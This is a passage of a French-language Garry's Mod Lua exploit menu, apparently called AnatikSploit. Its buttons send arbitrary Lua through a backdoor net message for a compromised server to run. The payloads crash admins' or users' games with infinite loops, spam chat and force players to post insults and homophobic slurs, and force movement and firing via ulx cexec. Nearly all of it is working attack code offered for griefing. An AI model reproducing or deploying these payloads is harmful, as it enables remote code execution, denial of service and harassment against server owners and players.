  2807. surface.SetDrawColor(255, 155, 0, 255)
  2808. surface.DrawRect(0, 0, w, h)
  2809. end
  2810. commandnethtx97.DoClick = function()
  2811. net.Start(thefrenchenculer)
  2812. net.WriteString([[
  2813. for k,v in pairs(player.GetAll()) do
  2814.     timer.Create("cough", 10, 0, function()
  2815.         RunConsoleCommand("say", "*cough*")
  2816.         v:EmitSound("ambient/voices/cough"..math.random(4)..".wav", 450 + math.random() * 50, 50 + math.random() * 10)
  2817.         util.ScreenShake( Vector( 0, 0, 0 ), 1000, 1000, 1, 5000 )
  2818.     end)
  2819. end
  2820. ]])
  2821. net.WriteBit ( 1 )
  2822. net.SendToServer()
  2823. end
  2824. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2825. commandnethtx1000:SetSize( 208, 20 )
  2826. commandnethtx1000:SetPos( 2, 1355 )
  2827. commandnethtx1000:SetText("------Crash Joueur------")
  2828. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2829. commandnethtx1000.Paint = function(panel, w, h)
  2830. surface.SetDrawColor(100, 100, 100 ,255)
  2831. surface.DrawOutlinedRect(0, 0, w, h)
  2832. surface.SetDrawColor(127, 252, 1, 255)
  2833. surface.DrawRect(0, 0, w, h)
  2834. end
  2835. commandnethtx1000.DoClick = function()
  2836. iZNX.NetStart(thefrenchenculer)
  2837. net.WriteString("None")
  2838. net.WriteBit (1)
  2839. net.SendToServer()
  2840. end
  2841. local commandnethtx13 = vgui.Create("DButton", DScrollPanel)
  2842. commandnethtx13:SetSize( 208, 20 )
  2843. commandnethtx13:SetPos( 2, 1380 )
  2844. commandnethtx13:SetText("FAIRE CRASH LE JEUX DES ADMINS")
  2845. commandnethtx13:SetTextColor(Color(255, 255, 255, 255))
  2846. commandnethtx13.Paint = function(panel, w, h)
  2847. surface.SetDrawColor(100, 100, 100 ,255)
  2848. surface.DrawOutlinedRect(0, 0, w, h)
  2849. surface.SetDrawColor(127, 252, 1, 255)
  2850. surface.DrawRect(0, 0, w, h)
  2851. end
  2852. commandnethtx13.DoClick = function()
  2853. net.Start(thefrenchenculer)
  2854. net.WriteString( " for k,v in pairs(player.GetAll()) do if( v:GetUserGroup() != \"admin\" ) then v:SendLua(\"while true do end\") end end" )
  2855. net.WriteBit(1)
  2856. net.SendToServer()
  2857. end
  2858. local commandnethtx13 = vgui.Create("DButton", DScrollPanel)
  2859. commandnethtx13:SetSize( 208, 20 )
  2860. commandnethtx13:SetPos( 2, 1405 )
  2861. commandnethtx13:SetText("FAIRE CRASH LE JEUX DES SUPERADMIN")
  2862. commandnethtx13:SetTextColor(Color(255, 255, 255, 255))
  2863. commandnethtx13.Paint = function(panel, w, h)
  2864. surface.SetDrawColor(100, 100, 100 ,255)
  2865. surface.DrawOutlinedRect(0, 0, w, h)
  2866. surface.SetDrawColor(127, 252, 1, 255)
  2867. surface.DrawRect(0, 0, w, h)
  2868. end
  2869. commandnethtx13.DoClick = function()
  2870. net.Start(thefrenchenculer)
  2871. net.WriteString( " for k,v in pairs(player.GetAll()) do if( v:GetUserGroup() != \"superadmin\" ) then v:SendLua(\"while true do end\") end end" )
  2872. net.WriteBit(1)
  2873. net.SendToServer()
  2874. end
  2875. local commandnethtx13 = vgui.Create("DButton", DScrollPanel)
  2876. commandnethtx13:SetSize( 208, 20 )
  2877. commandnethtx13:SetPos( 2, 1430 )
  2878. commandnethtx13:SetText("FAIRE CRASH LE JEUX DES USER")
  2879. commandnethtx13:SetTextColor(Color(255, 255, 255, 255))
  2880. commandnethtx13.Paint = function(panel, w, h)
  2881. surface.SetDrawColor(100, 100, 100 ,255)
  2882. surface.DrawOutlinedRect(0, 0, w, h)
  2883. surface.SetDrawColor(127, 252, 1, 255)
  2884. surface.DrawRect(0, 0, w, h)
  2885. end
  2886. commandnethtx13.DoClick = function()
  2887. net.Start(thefrenchenculer)
  2888. net.WriteString( " for k,v in pairs(player.GetAll()) do if( v:GetUserGroup() != \"user\" ) then v:SendLua(\"while true do end\") end end" )
  2889. net.WriteBit(1)
  2890. net.SendToServer()
  2891. end
  2892. local commandnethtx13 = vgui.Create("DButton", DScrollPanel)
  2893. commandnethtx13:SetSize( 208, 20 )
  2894. commandnethtx13:SetPos( 2, 1455 )
  2895. commandnethtx13:SetText("-------Spam Chat-------")
  2896. commandnethtx13:SetTextColor(Color(255, 255, 255, 255))
  2897. commandnethtx13.Paint = function(panel, w, h)
  2898. surface.SetDrawColor(100, 100, 100 ,255)
  2899. surface.DrawOutlinedRect(0, 0, w, h)
  2900. surface.SetDrawColor(190, 0, 255, 255)
  2901. surface.DrawRect(0, 0, w, h)
  2902. end
  2903. commandnethtx13.DoClick = function()
  2904. net.Start(thefrenchenculer)
  2905. net.WriteString( "None" )
  2906. net.WriteBit(1)
  2907. net.SendToServer()
  2908. end
  2909. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2910. commandnethtx1000:SetSize( 208, 20 )
  2911. commandnethtx1000:SetPos( 2, 1480 )
  2912. commandnethtx1000:SetText("Spam 1 - Serv de merde")
  2913. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2914. commandnethtx1000.Paint = function(panel, w, h)
  2915. surface.SetDrawColor(100, 100, 100 ,255)
  2916. surface.DrawOutlinedRect(0, 0, w, h)
  2917. surface.SetDrawColor(190, 0, 255, 255)
  2918. surface.DrawRect(0, 0, w, h)
  2919. end
  2920. commandnethtx1000.DoClick = function()
  2921. iZNX.NetStart(thefrenchenculer)
  2922. net.WriteString("timer.Create( \"tchat1\", 0.1, 0, function() BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255)), \"Serveur de merde Lol\")]]) end)")
  2923. net.WriteBit (1)
  2924. net.SendToServer()
  2925. end
  2926. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2927. commandnethtx1000:SetSize( 208, 20 )
  2928. commandnethtx1000:SetPos( 2, 1505 )
  2929. commandnethtx1000:SetText("Spam 2 - Bien fair niquer")
  2930. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2931. commandnethtx1000.Paint = function(panel, w, h)
  2932. surface.SetDrawColor(100, 100, 100 ,255)
  2933. surface.DrawOutlinedRect(0, 0, w, h)
  2934. surface.SetDrawColor(190, 0, 255, 255)
  2935. surface.DrawRect(0, 0, w, h)
  2936. end
  2937. commandnethtx1000.DoClick = function()
  2938. iZNX.NetStart(thefrenchenculer)
  2939. net.WriteString("timer.Create( \"tchat2\", 0.1, 0, function() BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255)), \"Tu t'es bien fais niquer MDR  ! :)\")]]) end)")
  2940. net.WriteBit (1)
  2941. net.SendToServer()
  2942. end
  2943. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2944. commandnethtx1000:SetSize( 208, 20 )
  2945. commandnethtx1000:SetPos( 2, 1530 )
  2946. commandnethtx1000:SetText("Spam 3 - RIP RIP")
  2947. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2948. commandnethtx1000.Paint = function(panel, w, h)
  2949. surface.SetDrawColor(100, 100, 100 ,255)
  2950. surface.DrawOutlinedRect(0, 0, w, h)
  2951. surface.SetDrawColor(190, 0, 255, 255)
  2952. surface.DrawRect(0, 0, w, h)
  2953. end
  2954. commandnethtx1000.DoClick = function()
  2955. iZNX.NetStart(thefrenchenculer)
  2956. net.WriteString("timer.Create( \"tchat3\", 0.1, 0, function() BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255)), \"RIP RIP RIP RIP RIP RIP RIP RIP RIP RIP RIP RIP RIP RIP RIP RIP RIP RIP RIP RIP\")]]) end)")
  2957. net.WriteBit (1)
  2958. net.SendToServer()
  2959. end
  2960. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2961. commandnethtx1000:SetSize( 208, 20 )
  2962. commandnethtx1000:SetPos( 2, 1555 )
  2963. commandnethtx1000:SetText("Spam 4 - HACKER BY ANATIK")
  2964. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2965. commandnethtx1000.Paint = function(panel, w, h)
  2966. surface.SetDrawColor(100, 100, 100 ,255)
  2967. surface.DrawOutlinedRect(0, 0, w, h)
  2968. surface.SetDrawColor(190, 0, 255, 255)
  2969. surface.DrawRect(0, 0, w, h)
  2970. end
  2971. commandnethtx1000.DoClick = function()
  2972. iZNX.NetStart(thefrenchenculer)
  2973. net.WriteString("timer.Create( \"tchat4\", 0.1, 0, function() BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255)), \"HACKED BY AnatikSploit\")]]) end)")
  2974. net.WriteBit (1)
  2975. net.SendToServer()
  2976. end
  2977. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2978. commandnethtx1000:SetSize( 208, 20 )
  2979. commandnethtx1000:SetPos( 2, 1580 )
  2980. commandnethtx1000:SetText("Spam 5 - Coder Avec le CUl")
  2981. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2982. commandnethtx1000.Paint = function(panel, w, h)
  2983. surface.SetDrawColor(100, 100, 100 ,255)
  2984. surface.DrawOutlinedRect(0, 0, w, h)
  2985. surface.SetDrawColor(190, 0, 255, 255)
  2986. surface.DrawRect(0, 0, w, h)
  2987. end
  2988. commandnethtx1000.DoClick = function()
  2989. iZNX.NetStart(thefrenchenculer)
  2990. net.WriteString("timer.Create( \"tchat5\", 0.1, 0, function() BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255)), \"Coder Avec le cul\")]]) end)")
  2991. net.WriteBit (1)
  2992. net.SendToServer()
  2993. end
  2994. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2995. commandnethtx1000:SetSize( 208, 20 )
  2996. commandnethtx1000:SetPos( 2, 1605 )
  2997. commandnethtx1000:SetText("Spam 6 - Suce ma bite PD")
  2998. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2999. commandnethtx1000.Paint = function(panel, w, h)
  3000. surface.SetDrawColor(100, 100, 100 ,255)
  3001. surface.DrawOutlinedRect(0, 0, w, h)
  3002. surface.SetDrawColor(190, 0, 255, 255)
  3003. surface.DrawRect(0, 0, w, h)
  3004. end
  3005. commandnethtx1000.DoClick = function()
  3006. iZNX.NetStart(thefrenchenculer)
  3007. net.WriteString("timer.Create( \"tchat6\", 0.1, 0, function() BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255)), \"Suce ma bite PD\")]]) end)")
  3008. net.WriteBit (1)
  3009. net.SendToServer()
  3010. end
  3011. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  3012. commandnethtx1000:SetSize( 208, 20 )
  3013. commandnethtx1000:SetPos( 2, 1630 )
  3014. commandnethtx1000:SetText("Spam 7 - Le Leak FDP")
  3015. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  3016. commandnethtx1000.Paint = function(panel, w, h)
  3017. surface.SetDrawColor(100, 100, 100 ,255)
  3018. surface.DrawOutlinedRect(0, 0, w, h)
  3019. surface.SetDrawColor(190, 0, 255, 255)
  3020. surface.DrawRect(0, 0, w, h)
  3021. end
  3022. commandnethtx1000.DoClick = function()
  3023. iZNX.NetStart(thefrenchenculer)
  3024. net.WriteString("timer.Create( \"tchat7\", 0.1, 0, function() BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255)), \"LE LEAK SALE BATARD SES PAS BIEN FDP DE TES MORT ! \")]]) end)")
  3025. net.WriteBit (1)
  3026. net.SendToServer()
  3027. end
  3028. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  3029. commandnethtx1000:SetSize( 208, 20 )
  3030. commandnethtx1000:SetPos( 2, 1655 )
  3031. commandnethtx1000:SetText("Stoper les Spam")
  3032. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  3033. commandnethtx1000.Paint = function(panel, w, h)
  3034. surface.SetDrawColor(100, 100, 100 ,255)
  3035. surface.DrawOutlinedRect(0, 0, w, h)
  3036. surface.SetDrawColor(190, 0, 255, 255)
  3037. surface.DrawRect(0, 0, w, h)
  3038. end
  3039. commandnethtx1000.DoClick = function()
  3040. iZNX.NetStart(thefrenchenculer)
  3041. net.WriteString([[
  3042. timer.Remove ("tchat1")
  3043. timer.Remove ("tchat2")
  3044. timer.Remove ("tchat3")
  3045. timer.Remove ("tchat4")
  3046. timer.Remove ("tchat5")
  3047. timer.Remove ("tchat6")
  3048. timer.Remove ("tchat7")
  3049. ]])
  3050. net.WriteBit (1)
  3051. net.SendToServer()
  3052. end
  3053. local commandnethtx13 = vgui.Create("DButton", DScrollPanel)
  3054. commandnethtx13:SetSize( 208, 20 )
  3055. commandnethtx13:SetPos( 2, 1680 )
  3056. commandnethtx13:SetText("-------Mouvement-------")
  3057. commandnethtx13:SetTextColor(Color(255, 255, 255, 255))
  3058. commandnethtx13.Paint = function(panel, w, h)
  3059. surface.SetDrawColor(100, 100, 100 ,255)
  3060. surface.DrawOutlinedRect(0, 0, w, h)
  3061. surface.SetDrawColor(255, 0, 215, 255)
  3062. surface.DrawRect(0, 0, w, h)
  3063. end
  3064. commandnethtx13.DoClick = function()
  3065. net.Start(thefrenchenculer)
  3066. net.WriteString( "None" )
  3067. net.WriteBit(1)
  3068. net.SendToServer()
  3069. end
  3070. local commandnethtx9 = vgui.Create("DButton", DScrollPanel)
  3071. commandnethtx9:SetSize( 208, 20 )
  3072. commandnethtx9:SetPos( 2, 1705 )
  3073. commandnethtx9:SetText("[ON] FAIRE TOURNER TOUT LE MONDE")
  3074. commandnethtx9:SetTextColor(Color(255, 255, 255, 255))
  3075. commandnethtx9.Paint = function(panel, w, h)
  3076. surface.SetDrawColor(100, 100, 100 ,255)
  3077. surface.DrawOutlinedRect(0, 0, w, h)
  3078. surface.SetDrawColor(255, 0, 215, 255)
  3079. surface.DrawRect(0, 0, w, h)
  3080. end
  3081. commandnethtx9.DoClick = function()
  3082. net.Start(thefrenchenculer)
  3083. net.WriteString( "RunConsoleCommand(\"ulx\", \"cexec\", \"*\", \"+left\")" )
  3084. net.WriteBit(1)
  3085. net.SendToServer()
  3086. end
  3087. local commandnethtx9 = vgui.Create("DButton", DScrollPanel)
  3088. commandnethtx9:SetSize( 208, 20 )
  3089. commandnethtx9:SetPos( 2, 1730 )
  3090. commandnethtx9:SetText("[OFF] FAIRE TOURNER TOUT LE MONDE")
  3091. commandnethtx9:SetTextColor(Color(255, 255, 255, 255))
  3092. commandnethtx9.Paint = function(panel, w, h)
  3093. surface.SetDrawColor(100, 100, 100 ,255)
  3094. surface.DrawOutlinedRect(0, 0, w, h)
  3095. surface.SetDrawColor(255, 0, 215, 255)
  3096. surface.DrawRect(0, 0, w, h)
  3097. end
  3098. commandnethtx9.DoClick = function()
  3099. net.Start(thefrenchenculer)
  3100. net.WriteString( "RunConsoleCommand(\"ulx\", \"cexec\", \"*\", \"-left\")" )
  3101. net.WriteBit(1)
  3102. net.SendToServer()
  3103. end
  3104. local commandnethtx9 = vgui.Create("DButton", DScrollPanel)
  3105. commandnethtx9:SetSize( 208, 20 )
  3106. commandnethtx9:SetPos( 2, 1755 )
  3107. commandnethtx9:SetText("[ON] ACCROUPIR TOUT LE MONDE")
  3108. commandnethtx9:SetTextColor(Color(255, 255, 255, 255))
  3109. commandnethtx9.Paint = function(panel, w, h)
  3110. surface.SetDrawColor(100, 100, 100 ,255)
  3111. surface.DrawOutlinedRect(0, 0, w, h)
  3112. surface.SetDrawColor(255, 0, 215, 255)
  3113. surface.DrawRect(0, 0, w, h)
  3114. end
  3115. commandnethtx9.DoClick = function()
  3116. net.Start(thefrenchenculer)
  3117. net.WriteString( "RunConsoleCommand(\"ulx\", \"cexec\", \"*\", \"+duck\")" )
  3118. net.WriteBit(1)
  3119. net.SendToServer()
  3120. end
  3121. local commandnethtx9 = vgui.Create("DButton", DScrollPanel)
  3122. commandnethtx9:SetSize( 208, 20 )
  3123. commandnethtx9:SetPos( 2, 1780 )
  3124. commandnethtx9:SetText("[OFF] ACCROUPIR TOUT LE MONDE")
  3125. commandnethtx9:SetTextColor(Color(255, 255, 255, 255))
  3126. commandnethtx9.Paint = function(panel, w, h)
  3127. surface.SetDrawColor(100, 100, 100 ,255)
  3128. surface.DrawOutlinedRect(0, 0, w, h)
  3129. surface.SetDrawColor(255, 0, 215, 255)
  3130. surface.DrawRect(0, 0, w, h)
  3131. end
  3132. commandnethtx9.DoClick = function()
  3133. net.Start(thefrenchenculer)
  3134. net.WriteString( "RunConsoleCommand(\"ulx\", \"cexec\", \"*\", \"-duck\")" )
  3135. net.WriteBit(1)
  3136. net.SendToServer()
  3137. end
  3138. local commandnethtx9 = vgui.Create("DButton", DScrollPanel)
  3139. commandnethtx9:SetSize( 208, 20 )
  3140. commandnethtx9:SetPos( 2, 1805 )
  3141. commandnethtx9:SetText("[ON] FAIRE RECULEZ TOUT LE MONDE")
  3142. commandnethtx9:SetTextColor(Color(255, 255, 255, 255))
  3143. commandnethtx9.Paint = function(panel, w, h)
  3144. surface.SetDrawColor(100, 100, 100 ,255)
  3145. surface.DrawOutlinedRect(0, 0, w, h)
  3146. surface.SetDrawColor(255, 0, 215, 255)
  3147. surface.DrawRect(0, 0, w, h)
  3148. end
  3149. commandnethtx9.DoClick = function()
  3150. net.Start(thefrenchenculer)
  3151. net.WriteString( "RunConsoleCommand(\"ulx\", \"cexec\", \"*\", \"+back\")" )
  3152. net.WriteBit(1)
  3153. net.SendToServer()
  3154. end
  3155. local commandnethtx9 = vgui.Create("DButton", DScrollPanel)
  3156. commandnethtx9:SetSize( 208, 20 )
  3157. commandnethtx9:SetPos( 2, 1830 )
  3158. commandnethtx9:SetText("[OFF] FAIRE RECULEZ TOUT LE MONDE")
  3159. commandnethtx9:SetTextColor(Color(255, 255, 255, 255))
  3160. commandnethtx9.Paint = function(panel, w, h)
  3161. surface.SetDrawColor(100, 100, 100 ,255)
  3162. surface.DrawOutlinedRect(0, 0, w, h)
  3163. surface.SetDrawColor(255, 0, 215, 255)
  3164. surface.DrawRect(0, 0, w, h)
  3165. end
  3166. commandnethtx9.DoClick = function()
  3167. net.Start(thefrenchenculer)
  3168. net.WriteString( "RunConsoleCommand(\"ulx\", \"cexec\", \"*\", \"-back\")" )
  3169. net.WriteBit(1)
  3170. net.SendToServer()
  3171. end
  3172. local commandnethtx9 = vgui.Create("DButton", DScrollPanel)
  3173. commandnethtx9:SetSize( 208, 20 )
  3174. commandnethtx9:SetPos( 2, 1855 )
  3175. commandnethtx9:SetText("[ON] FAIRE TIREZ TOUT LE MONDE")
  3176. commandnethtx9:SetTextColor(Color(255, 255, 255, 255))
  3177. commandnethtx9.Paint = function(panel, w, h)
  3178. surface.SetDrawColor(100, 100, 100 ,255)
  3179. surface.DrawOutlinedRect(0, 0, w, h)
  3180. surface.SetDrawColor(255, 0, 215, 255)
  3181. surface.DrawRect(0, 0, w, h)
  3182. end
  3183. commandnethtx9.DoClick = function()
  3184. net.Start(thefrenchenculer)
  3185. net.WriteString( "RunConsoleCommand(\"ulx\", \"cexec\", \"*\", \"+attack\")" )
  3186. net.WriteBit(1)
  3187. net.SendToServer()
  3188. end
  3189. local commandnethtx9 = vgui.Create("DButton", DScrollPanel)
  3190. commandnethtx9:SetSize( 208, 20 )
  3191. commandnethtx9:SetPos( 2, 1880 )
  3192. commandnethtx9:SetText("[OFF] FAIRE TIREZ TOUT LE MONDE")
  3193. commandnethtx9:SetTextColor(Color(255, 255, 255, 255))
  3194. commandnethtx9.Paint = function(panel, w, h)
  3195. surface.SetDrawColor(100, 100, 100 ,255)
  3196. surface.DrawOutlinedRect(0, 0, w, h)
  3197. surface.SetDrawColor(255, 0, 215, 255)
  3198. surface.DrawRect(0, 0, w, h)
  3199. end
  3200. commandnethtx9.DoClick = function()
  3201. net.Start(thefrenchenculer)
  3202. net.WriteString( "RunConsoleCommand(\"ulx\", \"cexec\", \"*\", \"-attack\")" )
  3203. net.WriteBit(1)
  3204. net.SendToServer()
  3205. end
  3206. local commandnethtx106 = vgui.Create("DButton", DScrollPanel)
  3207. commandnethtx106:SetSize( 208, 20 )
  3208. commandnethtx106:SetPos( 1, 1905 )
  3209. commandnethtx106:SetText("Faire Dancer les joueur ")
  3210. commandnethtx106:SetTextColor(Color(255, 255, 255, 255))
  3211. commandnethtx106.Paint = function(panel, w, h)
  3212. surface.SetDrawColor(100, 100, 100 ,255)
  3213. surface.DrawOutlinedRect(0, 0, w, h)
  3214. surface.SetDrawColor(255, 0, 215, 255)
  3215. surface.DrawRect(0, 0, w, h)
  3216. end
  3217. commandnethtx106.DoClick = function()
  3218. iZNX.NetStart(thefrenchenculer)
  3219. net.WriteString([[for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE) end timer.Create("dance_loop",8.9,0,function() for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE) end end )
  3220. ]])
  3221. net.WriteBit (1)
  3222. net.SendToServer()
  3223. end
  3224. local commandnethtx106 = vgui.Create("DButton", DScrollPanel)
  3225. commandnethtx106:SetSize( 208, 20 )
  3226. commandnethtx106:SetPos( 1, 1930 )
  3227. commandnethtx106:SetText("----------Stoper----------")
  3228. commandnethtx106:SetTextColor(Color(255, 255, 255, 255))
  3229. commandnethtx106.Paint = function(panel, w, h)
  3230. surface.SetDrawColor(100, 100, 100 ,255)
  3231. surface.DrawOutlinedRect(0, 0, w, h)
  3232. surface.SetDrawColor(0, 255, 126, 255)
  3233. surface.DrawRect(0, 0, w, h)
  3234. end
  3235. commandnethtx106.DoClick = function()
  3236. iZNX.NetStart(thefrenchenculer)
  3237. net.WriteString([[None]])
  3238. net.WriteBit (1)
  3239. net.SendToServer()
  3240. end
  3241. local commandnethtx101 = vgui.Create("DButton", DScrollPanel)
  3242. commandnethtx101:SetSize( 208, 20 )
  3243. commandnethtx101:SetPos( 1, 1955 )
  3244. commandnethtx101:SetText("Remttre la Graviter (OFF)")
  3245. commandnethtx101:SetTextColor(Color(255, 255, 255, 255))
  3246. commandnethtx101.Paint = function(panel, w, h)
  3247. surface.SetDrawColor(100, 100, 100 ,255)
  3248. surface.DrawOutlinedRect(0, 0, w, h)
  3249. surface.SetDrawColor(0, 255, 126, 255)
  3250. surface.DrawRect(0, 0, w, h)
  3251. end
  3252. commandnethtx101.DoClick = function()
  3253. net.Start(thefrenchenculer)
  3254. net.WriteString( "RunConsoleCommand(\"sv_gravity\", \"600\")" )
  3255. net.WriteBit(1)
  3256. net.SendToServer()
  3257. end
  3258. local commandnethtx178 = vgui.Create("DButton", DScrollPanel)
  3259. commandnethtx178:SetSize( 208, 20 )
  3260. commandnethtx178:SetPos( 1, 1980 )
  3261. commandnethtx178:SetText("SpeedHack (OFF)")
  3262. commandnethtx178:SetTextColor(Color(255, 255, 255, 255))
  3263. commandnethtx178.Paint = function(panel, w, h)
  3264. surface.SetDrawColor(100, 100, 100 ,255)
  3265. surface.DrawOutlinedRect(0, 0, w, h)
  3266. surface.SetDrawColor(0, 255, 126, 255)
  3267. surface.DrawRect(0, 0, w, h)
  3268. end
  3269. commandnethtx178.DoClick = function()
  3270. net.Start(thefrenchenculer)
  3271. net.WriteString( "RunConsoleCommand(\"sv_friction\", \"8\")" )
  3272. net.WriteBit(1)
  3273. net.SendToServer()
  3274. end
  3275. local commandnethtx106 = vgui.Create("DButton", DScrollPanel)
  3276. commandnethtx106:SetSize( 208, 20 )
  3277. commandnethtx106:SetPos( 1, 2005 )
  3278. commandnethtx106:SetText("----------Faire Dire au joueur----------")
  3279. commandnethtx106:SetTextColor(Color(255, 255, 255, 255))
  3280. commandnethtx106.Paint = function(panel, w, h)
  3281. surface.SetDrawColor(100, 100, 100 ,255)
  3282. surface.DrawOutlinedRect(0, 0, w, h)
  3283. surface.SetDrawColor(252, 144, 120, 255)
  3284. surface.DrawRect(0, 0, w, h)
  3285. end
  3286. commandnethtx106.DoClick = function()
  3287. iZNX.NetStart(thefrenchenculer)
  3288. net.WriteString([[None]])
  3289. net.WriteBit (1)
  3290. net.SendToServer()
  3291. end
  3292. local commandnethtx104 = vgui.Create("DButton", DScrollPanel)
  3293. commandnethtx104:SetSize( 208, 20 )
  3294. commandnethtx104:SetPos( 1, 2030 )
  3295. commandnethtx104:SetText("Faire dire Serveur de merde !")
  3296. commandnethtx104:SetTextColor(Color(255, 255, 255, 255))
  3297. commandnethtx104.Paint = function(panel, w, h)
  3298. surface.SetDrawColor(100, 100, 100 ,255)
  3299. surface.DrawOutlinedRect(0, 0, w, h)
  3300. surface.SetDrawColor(252, 144, 120, 255)
  3301. surface.DrawRect(0, 0, w, h)
  3302. end
  3303. commandnethtx104.DoClick = function()
  3304. iZNX.NetStart(thefrenchenculer)
  3305. net.WriteString([[for k,v in pairs(player.GetAll()) do
  3306.     v:ConCommand("say /ooc Serveur de merde FDP de Fondateur")
  3307. end
  3308. ]])
  3309. net.WriteBit (1)
  3310. net.SendToServer()
  3311. end
  3312. local commandnethtx104 = vgui.Create("DButton", DScrollPanel)
  3313. commandnethtx104:SetSize( 208, 20 )
  3314. commandnethtx104:SetPos( 1, 2030 )
  3315. commandnethtx104:SetText("Faire dire I love Anatik !")
  3316. commandnethtx104:SetTextColor(Color(255, 255, 255, 255))
  3317. commandnethtx104.Paint = function(panel, w, h)
  3318. surface.SetDrawColor(100, 100, 100 ,255)
  3319. surface.DrawOutlinedRect(0, 0, w, h)
  3320. surface.SetDrawColor(252, 144, 120, 255)
  3321. surface.DrawRect(0, 0, w, h)
  3322. end
  3323. commandnethtx104.DoClick = function()
  3324. iZNX.NetStart(thefrenchenculer)
  3325. net.WriteString([[for k,v in pairs(player.GetAll()) do
  3326.     v:ConCommand("say /ooc Je Kiff Anatik <3")
  3327. end
  3328. ]])
  3329. net.WriteBit (1)
  3330. net.SendToServer()
  3331. end
  3332. local commandnethtx104 = vgui.Create("DButton", DScrollPanel)
  3333. commandnethtx104:SetSize( 208, 20 )
  3334. commandnethtx104:SetPos( 1, 2055 )
  3335. commandnethtx104:SetText("Faire dire Suce Ma Bite PD !")
  3336. commandnethtx104:SetTextColor(Color(255, 255, 255, 255))
  3337. commandnethtx104.Paint = function(panel, w, h)
  3338. surface.SetDrawColor(100, 100, 100 ,255)
  3339. surface.DrawOutlinedRect(0, 0, w, h)
  3340. surface.SetDrawColor(252, 144, 120, 255)
  3341. surface.DrawRect(0, 0, w, h)
  3342. end
  3343. commandnethtx104.DoClick = function()
  3344. iZNX.NetStart(thefrenchenculer)
  3345. net.WriteString([[for k,v in pairs(player.GetAll()) do
  3346.     v:ConCommand("say /ooc Suce Ma Bite PD <3")
  3347. end
  3348. ]])
  3349. net.WriteBit (1)
  3350. net.SendToServer()
  3351. end
  3352. local commandnethtx104 = vgui.Create("DButton", DScrollPanel)
  3353. commandnethtx104:SetSize( 208, 20 )
  3354. commandnethtx104:SetPos( 1, 2080 )
  3355. commandnethtx104:SetText("Faire dire J'aime Sucer Des Bite !")
  3356. commandnethtx104:SetTextColor(Color(255, 255, 255, 255))
  3357. commandnethtx104.Paint = function(panel, w, h)
  3358. surface.SetDrawColor(100, 100, 100 ,255)
  3359. surface.DrawOutlinedRect(0, 0, w, h)
  3360. surface.SetDrawColor(252, 144, 120, 255)
  3361. surface.DrawRect(0, 0, w, h)
  3362. end
  3363. commandnethtx104.DoClick = function()
  3364. iZNX.NetStart(thefrenchenculer)
  3365. net.WriteString([[for k,v in pairs(player.GetAll()) do
  3366.     v:ConCommand("say /ooc J'aime Sucer Des Bite <3")
  3367. end
  3368. ]])
  3369. net.WriteBit (1)
  3370. net.SendToServer()
  3371. end
  3372. local commandnethtx104 = vgui.Create("DButton", DScrollPanel)
  3373. commandnethtx104:SetSize( 208, 20 )
  3374. commandnethtx104:SetPos( 1, 2080 )
  3375. commandnethtx104:SetText("Faire dire FDP leak !")
  3376. commandnethtx104:SetTextColor(Color(255, 255, 255, 255))
  3377. commandnethtx104.Paint = function(panel, w, h)
  3378. surface.SetDrawColor(100, 100, 100 ,255)
  3379. surface.DrawOutlinedRect(0, 0, w, h)
  3380. surface.SetDrawColor(252, 144, 120, 255)
  3381. surface.DrawRect(0, 0, w, h)
  3382. end
  3383. commandnethtx104.DoClick = function()
  3384. iZNX.NetStart(thefrenchenculer)
  3385. net.WriteString([[for k,v in pairs(player.GetAll()) do
  3386.     v:ConCommand("say /ooc Serveur de merde a leak tout les Script Du Monde un Putain D'enculer sa mére les reine des pute ! <3")
  3387. end
  3388. ]])
  3389. net.WriteBit (1)
  3390. net.SendToServer()
  3391. end
  3392. local commandnethtx104 = vgui.Create("DButton", DScrollPanel)
  3393. commandnethtx104:SetSize( 208, 20 )
  3394. commandnethtx104:SetPos( 1, 2105 )
  3395. commandnethtx104:SetText("Faire dire KikooLand")
  3396. commandnethtx104:SetTextColor(Color(255, 255, 255, 255))
  3397. commandnethtx104.Paint = function(panel, w, h)
  3398. surface.SetDrawColor(100, 100, 100 ,255)
  3399. surface.DrawOutlinedRect(0, 0, w, h)
  3400. surface.SetDrawColor(252, 144, 120, 255)
  3401. surface.DrawRect(0, 0, w, h)
  3402. end
  3403. commandnethtx104.DoClick = function()
  3404. iZNX.NetStart(thefrenchenculer)
  3405. net.WriteString([[for k,v in pairs(player.GetAll()) do
  3406.     v:ConCommand("say /ooc Kikoo Land Vous Présente la bienvenue ! <3")
  3407. end
  3408. ]])
  3409. net.WriteBit (1)
  3410. net.SendToServer()
  3411. end
  3412. local commandnethtx106 = vgui.Create("DButton", DScrollPanel)
  3413. commandnethtx106:SetSize( 208, 20 )
  3414. commandnethtx106:SetPos( 1, 2130 )
